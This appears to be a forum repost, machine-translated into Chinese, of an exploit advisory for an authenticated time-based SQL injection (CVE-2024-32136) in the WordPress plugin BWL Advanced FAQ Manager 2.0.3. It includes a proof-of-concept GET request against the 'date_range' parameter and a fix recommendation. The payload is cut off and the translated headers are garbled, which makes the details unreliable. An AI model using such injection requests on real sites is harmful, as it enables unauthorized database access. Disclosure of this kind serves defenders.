H

BWL Advanced FAQ Manager 2.0.3-身份验证的SQL注入

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
利用标题: BWL Advanced FAQ Manager 2.0.3-身份验证的SQL注入
日期: 2024年4月14日
剥削作者: Ivan Spiritonov(XBZ0N)
软件link: https://codecanyon.net/item/bwl-advanced-faq-manager/5007135
版本: 2.0.3
在: Ubuntu 20.04测试
CVE: CVE-2024-32136
SQL注入
SQL注入是一种安全漏洞,允许攻击者干扰应用程序的数据库查询。它通常涉及通过客户从客户端中的输入数据插入或“注入” SQL查询。成功的SQL注入漏洞可以从数据库中读取敏感数据,修改数据库数据(插入/update/delete),在数据库上执行管理操作(例如关闭DBMS),恢复DBMS文件系统上存在的给定文件的内容,在某些情况下,对操作系统发出命令。
受影响的组件
Plugin: BWL高级常见问题管理器
版本: 2.0.3
受影响的参数:'date_range'
受影响的Page: /wp-admin/edit.php
描述
该漏洞存在于BWL高级常见问题管理器插件的“ BWL-Advanced-FAQ-Analytics”页面中使用的“ date_range”参数中。身份验证的攻击者可以通过操纵此参数的输入来执行数据库中的任意SQL命令。
概念证明
手动剥削
以下获取请求演示了漏洞:
get/wp-admin/edit.php?page=bwl-advanced-faq-analyticspost_type=bwl_advanced_faqfilter_faqfilter_type=viewsdate_range=(select*
HOST: LOCALHOST
用户代理: Mozilla/5.0(Macintosh; Intel Mac OS X 10.15; Rv:121.0)gecko/20100101 Firefox/121.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
Referer: http://localhost/wp-admin/edit.php?
连接:关闭
cookie: [相关饼干]
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
如果服务器响应延迟了大约20秒,则表明对基于时间的SQL注入的成功探索,从而确认了漏洞。
建议
建议您建议用户将插件更新为固定版本v2.0.4。
 
后退
顶部